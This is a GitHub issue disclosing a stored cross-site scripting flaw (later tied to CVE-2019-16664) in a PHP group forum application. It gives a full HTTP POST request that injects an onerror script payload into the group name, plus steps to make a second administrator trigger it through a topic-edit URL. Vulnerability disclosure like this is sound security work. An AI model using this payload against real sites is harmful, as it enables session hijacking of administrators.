Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Stored xss when administrator edits posts in the same group, or just click a url #20

Open
ChandlerChin opened this issue Sep 21, 2019 · 1 comment
Open

Stored xss when administrator edits posts in the same group, or just click a url #20

ChandlerChin opened this issue Sep 21, 2019 · 1 comment

Comments

@ChandlerChin
Copy link

ChandlerChin commented Sep 21, 2019
edited
Loading

Stored xss when administrator edits posts in the same group, or just click a url
存储型跨站漏洞,当组管理员修改组内帖子时触发,也可直接点击触发

Ways to reproduce:
复现方法:

1 admin1 creates a new group with the following request, notice that the malicious code has been injected in groupname param.
1 admin1使用如下请求建立一个小组,注意groupname字段已经被注入恶意代码。

POST /index.php?app=group&ac=create&ts=do HTTP/1.1
Host: youdomain
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: multipart/form-data; boundary=---------------------------159522762613371
Content-Length: 685
Cookie: 
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------159522762613371
Content-Disposition: form-data; name="groupname"

`<img src=1 onerror=alert(1)>`
-----------------------------159522762613371
Content-Disposition: form-data; name="groupdesc"

aaaaaaaaaaaaaaa
-----------------------------159522762613371
Content-Disposition: form-data; name="photo"; filename=""
Content-Type: application/octet-stream


-----------------------------159522762613371
Content-Disposition: form-data; name="tag"

aaaaaaaaaaaaaaa
-----------------------------159522762613371
Content-Disposition: form-data; name="token"

99dc80d60a3284e86a8eef06c28a932f5614d29a
-----------------------------159522762613371--

2 admin1 invites admin2 as an administrator of this new group and post anything. PS: without agreement, one could invite anyone as his group adminstrator.
2 admin1邀请admin2作为小组管理员,并发帖。同时:邀请别人成为小组管理员并不需要获得其同意。
3 once admin2 edits any posts in this group, or just click: http://yourdomian/thinknew/index.php?app=group&ac=topicedit&topicid={your_topic_id_which_easy_to_get}
admin2 would execute the js code which had been injected in the group name.
3 当admin2管理组内帖子时,或只是点击url:http://yourdomian/thinknew/index.php?app=group&ac=topicedit&topicid={你的topic id,很容易获取}
admin2将执行已经被嵌入groupname中的js代码
@OS-WS
Copy link

OS-WS commented Dec 31, 2020

Hi, is there a fix for CVE-2019-16664?
If so, in what commit?

thanks in advance 💯

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@ChandlerChin @OS-WS